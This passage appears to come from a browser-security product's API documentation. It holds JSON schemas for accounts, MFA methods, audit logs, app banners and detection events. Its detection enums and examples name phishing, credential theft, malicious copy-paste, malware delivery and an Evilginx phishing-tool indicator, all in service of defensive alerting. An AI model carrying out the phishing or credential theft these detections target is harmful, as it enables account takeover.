(Other)","prefix":{"name":"post","color":"post"},"badges":[],"link":"/entities/app-other-event","deprecated":false},{"title":"browser","summary":"Browser","prefix":{"name":"post","color":"post"},"badges":[],"link":"/entities/browser-event","deprecated":false},{"title":"browser-extension","summary":"Browser Extension","prefix":{"name":"post","color":"post"},"badges":[],"link":"/entities/browser-extension-event","deprecated":false},{"title":"employee","summary":"Employee","prefix":{"name":"post","color":"post"},"badges":[],"link":"/entities/employee-event","deprecated":false},{"title":"finding","summary":"Finding","prefix":{"name":"post","color":"post"},"badges":[],"link":"/entities/finding-event","deprecated":false}]}]}]}]}}],"store":{"schemaStore":{"components/schemas/MfaMethodsType":{"id":"components/schemas/MfaMethodsType","kind":"json-schema","title":"MfaMethodsType","data":{"title":"MfaMethodsType","type":"string","enum":["APP_TOTP","PUSH_NOTIFICATION","EMAIL_OTP","U2F","HARDWARE_TOTP","PHONE_CALL","SMS_OTP","APP_PASSWORD","GRID_CARD","EXTERNAL_PROVIDER","BACKUP_CODES","WEBAUTHN"],"x-enumDescriptions":{"APP_TOTP":"Time-based one-time password via app","PUSH_NOTIFICATION":"Authentication prompt on device","EMAIL_OTP":"One-time password sent to email","U2F":"Physical security key","HARDWARE_TOTP":"Time-based password via hardware token","PHONE_CALL":"Voice verification","SMS_OTP":"One-time password sent via SMS","APP_PASSWORD":"Specialized password for app access","GRID_CARD":"Reference card with codes","EXTERNAL_PROVIDER":"Third-party authentication service","BACKUP_CODES":"Pre-generated one-time codes","WEBAUTHN":"Two-factor authentication with biometrics support"},"description":"All possible ENUM values for MfaMethods"}},"components/schemas/AccountEvent":{"id":"components/schemas/AccountEvent","kind":"json-schema","title":"Account","data":{"title":"Account","type":"object","description":"This object represents an account in your organization.","properties":{"id":{"type":"string","description":"Unique identifier for the account","example":"d6a32ba5-0532-4a66-8137-48cdf409c972"},"employeeId":{"type":"string","description":"Identifier of primary employee that this account belongs to","example":"72d0347a-2663-4ef5-b1c5-df39163f1603"},"appType":{"type":"string","description":"The app associated with this account","example":"ATLASSIAN"},"appId":{"type":"string","description":"The ID of the app associated with this account","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"email":{"type":"string","description":"The email address used to log into the account","format":"email","example":"john.hill@example.com"},"mfaRegistered":{"type":"boolean","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Whether MFA is registered or not. If unknown, "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" is provided."},"children":[]}]}]}],"nullable":true,"example":true},"mfaMethods":{"type":"array","items":{"$ref":"#/components/schemas/MfaMethodsType"},"description":"The MFA methods registered for this account","nullable":true},"passwordId":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Identifier of the password used on this account. The actual password is not sent up by the browser extension and so this is an identifier for it instead. This value is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if password authentication is not used."},"children":[]}]}]}],"nullable":true,"example":"4c13674f-e88a-4411-bfa2-53a70468a898"},"loginMethods":{"type":"object","properties":{"passwordLogin":{"type":"boolean","description":"Whether or not this account has been logged into with a password","example":true},"oidcLogin":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The identity provider that was used to do an OIDC login on this account. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if no OIDC login has been performed."},"children":[]}]}]}],"nullable":true,"example":"GOOGLE_WORKSPACE"},"samlLogin":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The identity provider that was used to do a SAML login on this account. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if no SAML login has been performed."},"children":[]}]}]}],"nullable":true,"example":"OKTA"},"oktaSwaLogin":{"type":"boolean","description":"Whether or not this account has been logged into with Okta SWA","example":true},"vendorSsoLogin":{"type":"string","description":"Whether or not this account has an associated vendor SSO provider.","nullable":true,"example":"GOOGLE_WORKSPACE"},"fedCmLogin":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The identity provider that was used to do a FedCM login on this account. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if no FedCM login has been performed."},"children":[]}]}]}],"nullable":true,"example":"GOOGLE_WORKSPACE"}}},"creationTimestamp":{"type":"integer","description":"When this account was created, formatted as a UNIX timestamp (in seconds)","example":1698064423},"lastUsedTimestamp":{"type":"integer","nullable":true,"description":"When the account was last used by an employee, formatted as a UNIX timestamp (in seconds)","example":1698669168}}}},"components/schemas/AdminAuditLogActor":{"id":"components/schemas/AdminAuditLogActor","kind":"json-schema","title":"Admin Audit Log Actor","data":{"title":"Admin Audit Log Actor","type":"object","description":"This object contains information about the user that performed the action triggering the audit log.","properties":{"source":{"type":"string","enum":["UI"],"description":"The source of the action that generated the event."},"email":{"type":"string","description":"The email address of the actor."},"sourceIpAddress":{"type":"string","description":"The IP address of the actor."},"userAgent":{"type":"string","nullable":true,"description":"The user agent of the actor, if available."},"role":{"type":"string","nullable":true,"enum":["OWNER","FULL_ACCESS","READ_ONLY"],"description":"The role of the actor."}},"required":["source","email","sourceIpAddress","userAgent","role"]}},"components/schemas/AdminAuditLogActorAPI":{"id":"components/schemas/AdminAuditLogActorAPI","kind":"json-schema","title":"Admin Audit Log Actor API","data":{"title":"Admin Audit Log Actor API","type":"object","description":"This object contains details about the API Key used in the API request that triggered the audit log.","properties":{"source":{"type":"string","enum":["API"],"description":"The source of the action that generated the event."},"apiKeyName":{"type":"string","description":"The name given to the API Key at creation time."},"apiKeyCreatedBy":{"type":"string","description":"The email address of the admin user that created the API Key."},"sourceIpAddress":{"type":"string","description":"The IP address of the actor."},"userAgent":{"type":"string","nullable":true,"description":"The user agent of the actor, if available."}},"required":["source","apiKeyName","apiKeyCreatedBy","sourceIpAddress","userAgent"]}},"components/schemas/AccountOther":{"id":"components/schemas/AccountOther","kind":"json-schema","title":"Account (other)","data":{"title":"Account (other)","type":"object","description":"This object represents an account (other) in your organization.","properties":{"id":{"type":"string","description":"Unique identifier for the account","example":"1009e8cb-497b-49ae-ac87-e083e42078d2"},"employeeId":{"type":"string","description":"Identifier of primary employee that this account belongs to","example":"72d0347a-2663-4ef5-b1c5-df39163f1603"},"otherAppId":{"type":"string","description":"The ID of the app associated with this account","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"email":{"type":"string","description":"The email address used to log into the account","format":"email","example":"john.hill@example.com"},"loginMethods":{"type":"object","required":["passwordLogin","oidcLogin","samlLogin","fedCmLogin"],"properties":{"passwordLogin":{"type":"boolean","description":"Whether or not this account has been logged into with a password","example":true},"oidcLogin":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The identity provider that was used to do an OIDC login on this account. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if no OIDC login has been performed."},"children":[]}]}]}],"nullable":true,"example":"GOOGLE_WORKSPACE"},"samlLogin":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The identity provider that was used to do a SAML login on this account. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if no SAML login has been performed."},"children":[]}]}]}],"nullable":true,"example":"OKTA"},"fedCmLogin":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The identity provider that was used to do a FedCM login on this account. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if no FedCM login has been performed."},"children":[]}]}]}],"nullable":true,"example":"GOOGLE_WORKSPACE"}}},"creationTimestamp":{"type":"integer","description":"When the account was first observed, formatted as a UNIX timestamp (in seconds)","example":1698064423},"lastUsedTimestamp":{"type":"integer","nullable":true,"description":"When the account was last used by an employee, formatted as a UNIX timestamp (in seconds)","example":1698669168}}}},"components/schemas/RoleType":{"id":"components/schemas/RoleType","kind":"json-schema","title":"RoleType","data":{"title":"RoleType","enum":["OWNER","FULL_ACCESS","READ_ONLY"],"description":"The role assigned.","type":"string"}},"components/schemas/ApprovalStatusType":{"id":"components/schemas/ApprovalStatusType","kind":"json-schema","title":"ApprovalStatusType","data":{"title":"ApprovalStatusType","type":"string","enum":["UNDER_REVIEW","APPROVED","NOT_APPROVED"],"x-enumDescriptions":{"UNDER_REVIEW":"The app is under review","APPROVED":"The app has been approved","NOT_APPROVED":"The app has not been approved"},"description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Approval status of the app, "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if not set"},"children":[]}]}]}],"nullable":true}},"components/schemas/SensitivityLevelType":{"id":"components/schemas/SensitivityLevelType","kind":"json-schema","title":"SensitivityLevelType","data":{"title":"SensitivityLevelType","type":"string","enum":["HIGH","MEDIUM","LOW"],"x-enumDescriptions":{"HIGH":"The sensitivity of the app is high","MEDIUM":"The sensitivity of the app is medium","LOW":"The sensitivity of the app is low"},"description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The sensitivity level of the app, "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if not set"},"children":[]}]}]}],"nullable":true}},"components/schemas/AppCategory":{"id":"components/schemas/AppCategory","kind":"json-schema","title":"AppCategory","data":{"title":"AppCategory","type":"object","description":"A category associated with an app.","required":["code","name","group"],"properties":{"code":{"type":"integer","description":"Numeric code identifying the category","example":83},"name":{"type":"string","description":"Name of the category","example":"AI/ML Applications"},"group":{"type":"string","description":"The group this category belongs to","example":"Technology"}}}},"components/schemas/AppEvent":{"id":"components/schemas/AppEvent","kind":"json-schema","title":"App","data":{"title":"App","type":"object","description":"This object represents an app in your organization.","properties":{"id":{"type":"string","description":"Unique identifier for this object","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"type":{"type":"string","description":"The type of app, formatted as an ENUM value.","example":"ZAPIER"},"approvalStatus":{"$ref":"#/components/schemas/ApprovalStatusType"},"sensitivityLevel":{"$ref":"#/components/schemas/SensitivityLevelType"},"ownerId":{"type":"string","description":"Identifier of the employee who is the owner of this platform","example":"87569da6-fb7a-4df7-8ce2-246c14044911","nullable":true},"notes":{"type":"string","description":"Notes recorded on this app (Note - changes to this field do not trigger an UPDATE event)","example":"Last security audit: 16 January 2023.\n"},"categories":{"type":"array","description":"Categories associated with this app","items":{"$ref":"#/components/schemas/AppCategory"}},"creationTimestamp":{"type":"integer","description":"When the app was first observed, formatted as a UNIX timestamp (in seconds)","example":1698064423}}}},"components/schemas/EmployeeInEvent":{"id":"components/schemas/EmployeeInEvent","kind":"json-schema","title":"Employee","data":{"title":"Employee","type":"object","description":"This object represents an employee in your organization.","properties":{"id":{"type":"string","description":"Unique identifier for the employee","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"email":{"type":"string","description":"Primary email address of the employee","format":"email","example":"john.hill@example.com"},"firstName":{"type":"string","description":"First name of the employee","example":"John"},"lastName":{"type":"string","description":"Last name of the employee","example":"Hill"},"department":{"type":"string","description":"Department - as provided by connected API integrations","example":"Security Engineering"},"location":{"type":"string","description":"Location - as provided by connected API integrations","example":"New York"},"licensed":{"type":"boolean","description":"Whether the employee is licensed on the Push platform","example":true},"chatopsEnabled":{"type":"boolean","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Whether the employee has ChatOps enabled"},"children":[]},{"$$mdtype":"Node","type":"tag","tag":"html","inline":true,"attributes":{"name":"blockquote","attrs":{}},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Deprecation notice: this value no longer does anything unless you still have access to the legacy Employee chat topics functionality on your account. It will be removed in the next API version."},"children":[]}]}]}]}],"example":true,"deprecated":true},"creationTimestamp":{"type":"integer","description":"When this employee was created, formatted as a UNIX timestamp (in seconds)","example":1698669223}}}},"components/schemas/AppBannerModeType":{"id":"components/schemas/AppBannerModeType","kind":"json-schema","title":"AppBannerModeType","data":{"title":"AppBannerModeType","type":"string","enum":["INFORM","ACKNOWLEDGE","REASON","BLOCK"],"description":"All possible ENUM values for app banner modes"}},"components/schemas/AppBannerDisplayFrequencyType":{"id":"components/schemas/AppBannerDisplayFrequencyType","kind":"json-schema","title":"AppBannerDisplayFrequencyType","data":{"title":"AppBannerDisplayFrequencyType","type":"string","enum":["ONCE_PER_TAB","ONCE_PER_BROWSER"],"description":"All possible ENUM values for how frequently the app banner is displayed.","nullable":true}},"components/schemas/AppBanner":{"id":"components/schemas/AppBanner","kind":"json-schema","title":"App Banner","data":{"title":"App Banner","type":"object","description":"This object represents an app banner.","properties":{"title":{"type":"string","description":"Title of the app banner.","example":"This is a title"},"subtext":{"type":"string","description":"Subtext of the app banner.","example":"This is the subtext that supports limited [markdown](https://markdown.org)"},"mode":{"$ref":"#/components/schemas/AppBannerModeType"},"buttonText":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Button text of the app banner. Only applicable when the app banner is in "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"ACKNOWLEDGE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" or "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"REASON"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" mode, or is in "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"BLOCK"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" mode with "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"allowReasonSubmission"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" set to true."},"children":[]}]}]}],"example":"Proceed anyway","nullable":true},"allowReasonSubmission":{"type":"boolean","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Whether the user is allowed to submit a request to access a blocked page. Only applicable when the app banner is in "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"BLOCK"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" mode."},"children":[]}]}]}],"example":false,"nullable":true},"displayFrequency":{"$ref":"#/components/schemas/AppBannerDisplayFrequencyType"}}}},"components/schemas/AppBannerActionType":{"id":"components/schemas/AppBannerActionType","kind":"json-schema","title":"AppBannerActionType","data":{"title":"AppBannerActionType","type":"string","enum":["ACKNOWLEDGED","DISPLAYED","SUBMITTED_REASON"],"description":"All possible ENUM values for app banner actions"}},"components/schemas/BrowserType":{"id":"components/schemas/BrowserType","kind":"json-schema","title":"BrowserType","data":{"title":"BrowserType","enum":["CHROME","FIREFOX","EDGE","SAFARI","OPERA","BRAVE","ARC","ISLAND","PRISMA_ACCESS","UNKNOWN"],"description":"The browser used by the employee","x-exclude-enums":{"environments":["production"],"values":["ATLAS","COMET","DIA"]}}},"components/schemas/OSType":{"id":"components/schemas/OSType","kind":"json-schema","title":"OSType","data":{"title":"OSType","enum":["MACOS","WINDOWS","LINUX","CHROME_OS","IOS","ANDROID","UNKNOWN"],"description":"The OS used by the employee"}},"components/schemas/AppBannerEvent":{"id":"components/schemas/AppBannerEvent","kind":"json-schema","title":"App banner","data":{"title":"App banner","type":"object","description":"This object represents an app banner event, indicating an employee has interacted with an app banner.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"url":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The URL that the banner was shown on. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if an app rule was used."},"children":[]}]}]}],"example":"https://openai.com","nullable":true},"appType":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The app that the banner was configured on. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" if a URL pattern rule was used."},"children":[]}]}]}],"example":"OPENAI","nullable":true},"appBanner":{"$ref":"#/components/schemas/AppBanner"},"action":{"$ref":"#/components/schemas/AppBannerActionType"},"reason":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Reason provided by the employee for bypassing or requesting access to the app. Applicable when the action is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"SUBMITTED_REASON"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}],"example":"I need to access this app for my work.","nullable":true},"sourceIpAddress":{"type":"string","description":"The IP address of the user interacting with the app banner.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"}}}},"components/schemas/AppOther":{"id":"components/schemas/AppOther","kind":"json-schema","title":"App (Other)","data":{"title":"App (Other)","type":"object","description":"This object represents an app (other) in your organization.","properties":{"id":{"type":"string","description":"Unique identifier for this object","example":"35603905-ff98-4b7d-8940-eb1906a2bdf6"},"domain":{"type":"string","description":"Domain the user logged into. This value is null if a OIDC login is used","example":"app.pushsecurity.com","nullable":true},"oauthAppId":{"type":"string","description":"ID of the oauth app from the Identity Provider. This value is null if a password login is used.","example":"1234567890","nullable":true},"name":{"type":"string","description":"Name of the app. This value is null if a password login is used.","example":"Push Security","nullable":true},"hidden":{"type":"boolean","description":"Whether the app is hidden or not."},"requestSupportStatus":{"type":"string","description":"Current request support status of the app","example":"DISCOVERED"},"creationTimestamp":{"type":"integer","description":"When the app was first observed, formatted as a UNIX timestamp (in seconds)","example":1698064423}}}},"components/schemas/SeverityType":{"id":"components/schemas/SeverityType","kind":"json-schema","title":"SeverityType","data":{"title":"SeverityType","enum":["LOW","MEDIUM","HIGH","CRITICAL"],"description":"The severity of the detection"}},"components/schemas/DetectionType":{"id":"components/schemas/DetectionType","kind":"json-schema","title":"DetectionType","data":{"title":"DetectionType","description":"The type of detection","example":"PHISHING","enum":["BLOCKED_URL","CUSTOM","PHISHING","MALICIOUS_BROWSER_EXTENSION","MALWARE_DELIVERY","STOLEN_CREDENTIALS"]}},"components/schemas/ResponseTypeDetection":{"id":"components/schemas/ResponseTypeDetection","kind":"json-schema","title":"ResponseType","data":{"title":"ResponseType","enum":["BLOCKED","EMPLOYEE_IGNORED_WARNING","EMPLOYEE_WARNED","NOT_BLOCKED"],"description":"The response for the detection"}},"components/schemas/DetectionEventType":{"id":"components/schemas/DetectionEventType","kind":"json-schema","title":"DetectionEventType","data":{"title":"DetectionEventType","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The type of detection event. Built-in detection types use a fixed set of values. Custom detection types follow the pattern "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CUSTOM_*"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}],"example":"PHISHING_TOOL_DETECTED","oneOf":[{"title":"Built-in detections","type":"string","description":"Built-in detection event types.","enum":["PHISHING_TOOL_DETECTED","CLONED_LOGIN_PAGE_DETECTED","SSO_PASSWORD_USED","PROTECTED_PASSWORD_ENTERED","STOLEN_CREDENTIALS","BLOCKED_URL_VISITED","MALICIOUS_COPY_PASTE_DETECTED","KNOWN_BAD_BROWSER_EXTENSION_DETECTED","THREAT_DETECTED","AGENTIC_HUNT_DISCOVERED_THREAT"],"x-exclude-enums":{"environments":["production"],"values":["BLOCKED_DOMAIN_VISITED"]}},{"title":"Custom detections","type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Custom detection event types. Always starts with "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CUSTOM_"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}],"pattern":"^CUSTOM_","example":"CUSTOM_TORRENT_WEBSITE_VISIT"}]}},"components/schemas/ControlModeType":{"id":"components/schemas/ControlModeType","kind":"json-schema","title":"ControlModeType","data":{"title":"ControlModeType","type":"string","nullable":true,"enum":["INFORM","ACKNOWLEDGE","REASON","BLOCK","WARN","MONITOR"],"description":"All possible ENUM values for control modes."}},"components/schemas/ResponseTypeDetectionEvent":{"id":"components/schemas/ResponseTypeDetectionEvent","kind":"json-schema","title":"ResponseType","data":{"title":"ResponseType","enum":["BLOCKED","EMPLOYEE_IGNORED_WARNING","EMPLOYEE_WARNED","NOT_BLOCKED"],"description":"The response for the detection event."}},"components/schemas/DetectionChildEvent":{"id":"components/schemas/DetectionChildEvent","kind":"json-schema","title":"DetectionChildEvent","data":{"title":"DetectionChildEvent","type":"object","description":"This object represents an event that is associated with a detection.","properties":{"id":{"type":"string","description":"Identifier of the detection event.","example":"c478966c-f927-411c-b919-179832d3d50c"},"creationTimestamp":{"type":"integer","description":"When the event was created. Formatted as a UNIX timestamp (in seconds).","example":1698604061},"detectionEventType":{"$ref":"#/components/schemas/DetectionEventType"},"detectionEventName":{"oneOf":[{"title":"Built-in detections","type":"string","nullable":true,"description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Not available for built-in detection event types. Will be "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]},{"title":"Custom detections","type":"string","description":"The name of the custom detection event.","example":"Torrent website visit"}]},"accountId":{"type":"string","description":"Identifier of the account that the detection event is associated with.","example":"37cda962-7e78-49bc-8721-1becd16276a3","nullable":true},"appType":{"type":"string","description":"The type of app that the detection event is associated with.","example":"PUSH_SECURITY","nullable":true},"phishingToolIndicator":{"type":"string","example":"AITM_TOOL_EVILGINX_01","nullable":true},"controlMode":{"$ref":"#/components/schemas/ControlModeType","nullable":true},"description":{"type":"string","description":"The description of the detection event. Note: this is subject to change and should not be used to match on this object.","example":"Phishing attempt detected","nullable":true},"clonedLoginPageIndicator":{"type":"string","example":"MICROSOFT_01","nullable":true},"extensionId":{"type":"string","description":"The identifier of the browser extension involved in the detection event.","example":"dljjddkmmcminffjbcmeccgfbjlhmhlm","nullable":true},"extensionName":{"type":"string","description":"The name of the browser extension involved in the detection event.","example":"Example Extension","nullable":true},"profileEmail":{"type":"string","description":"The email associated with the browser profile involved in the detection event.","example":"john.hill@example.com","nullable":true},"maliciousBrowserExtensionIndicator":{"type":"string","example":"EXTENSION_ID","nullable":true},"customIndicator":{"type":"string","example":"TORRENT_MAGNET_LINK"},"response":{"$ref":"#/components/schemas/ResponseTypeDetectionEvent"},"email":{"type":"string","description":"The email associated with the account related to the detection event.","example":"john.hill@example.com","nullable":true},"url":{"type":"string","description":"The URL that the detection event was triggered on.","example":"https://example.com/phishing","nullable":true},"referrerUrl":{"type":"string","description":"The referrer URL.","example":"https://mail.google.com","nullable":true},"clonedLoginPageUrls":{"type":"array","items":{"type":"string"},"description":"The legitimate login page URL that was cloned.","example":["https://example.com/phishing"],"nullable":true},"sourceIpAddress":{"type":"string","description":"The source IP address.","example":"8.158.25.38"},"metadata":{"type":"string","description":"The metadata associated with the detection event.","example":"{\"source_type\": \"Telegram\", \"breach_type\": \"Stealer Malware Logs\", \"breach_publication_date\": \"2025-04-01\"}"},"experimental":{"type":"boolean","description":"Indicates if this detection event is experimental.","example":false}}}},"components/schemas/DetectionEvent":{"id":"components/schemas/DetectionEvent","kind":"json-schema","title":"Detection","data":{"title":"Detection","type":"object","description":"This object represents a detection event, indicating an employee has triggered an alert.","properties":{"id":{"type":"string","description":"Identifier of the detection","example":"c478966c-f927-411c-b919-179832d3d50c"},"employeeId":{"type":"string","description":"Identifier for the employee that triggered the event.","example":"37cda962-7e78-49bc-8721-1becd16276a3"},"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"browserId":{"type":"string","description":"Identifier of the browser that was used when the event was triggered.","example":"2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0"},"browser":{"$ref":"#/components/schemas/BrowserType"},"severity":{"$ref":"#/components/schemas/SeverityType"},"detectionType":{"$ref":"#/components/schemas/DetectionType"},"detectionLink":{"type":"string","format":"uri","description":"Link to the detection.","example":"https://console.pushsecurity.com/app/detections?id=c478966c-f927-411c-b919-179832d3d50c"},"response":{"$ref":"#/components/schemas/ResponseTypeDetection"},"creationTimestamp":{"type":"integer","description":"When the detection was created. Formatted as a UNIX timestamp (in seconds).","example":1698604061},"lastActivityTimestamp":{"type":"integer","description":"When the detection was last active. Formatted as a UNIX timestamp (in seconds).","example":1698604061},"archived":{"type":"boolean","description":"Whether the detection has been archived.","example":true},"classification":{"type":"string","nullable":true,"enum":["TRUE_POSITIVE","BENIGN_TRUE_POSITIVE","FALSE_POSITIVE"],"example":"FALSE_POSITIVE","description":"The classification of the detection."},"events":{"type":"array","items":{"$ref":"#/components/schemas/DetectionChildEvent"}}}}},"components/schemas/BlockedURLVisitedEvent":{"id":"components/schemas/BlockedURLVisitedEvent","kind":"json-schema","title":"Blocked URL Visited","data":{"title":"Blocked URL Visited","type":"object","description":"This object represents a blocked URL visited event, indicating an employee tried to visit a URL that has been blocked.","properties":{"employee":{"$ref":"#/components/schemas/EmployeeInEvent"},"url":{"type":"string","description":"The blocked URL.","example":"https://example.com/login"},"referrerUrl":{"type":"string","description":"The URL the user was on before navigating to the blocked URL.","example":"https://statics.teams.cdn.office.net/","nullable":true},"sourceIpAddress":{"type":"string","description":"The IP address of the user.","example":"8.158.25.38"},"browser":{"$ref":"#/components/schemas/BrowserType"},"os":{"$ref":"#/components/schemas/OSType"},"userAgent":{"type":"string","description":"The user agent string reported by the browser.","example":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"},"urlSchemaObfuscationBlock":{"type":"boolean","description":"Whether the URL was blocked because of schema obfuscation or not"}}}},"components/schemas/BrowserEvent":{"id":"components/schemas/BrowserEvent","kind":"json-schema","title":"Browser","data":{"title":"Browser","type":"object","description":"This object represents an employee's browser in your organization.","properties":{"id":{"type":"string","description":"Unique identifier for the browser","example":"1852b6ab-0cca-4c8d-8f14-4905497504ec"},"employeeId":{"type":"string","description":"Unique identifier for the 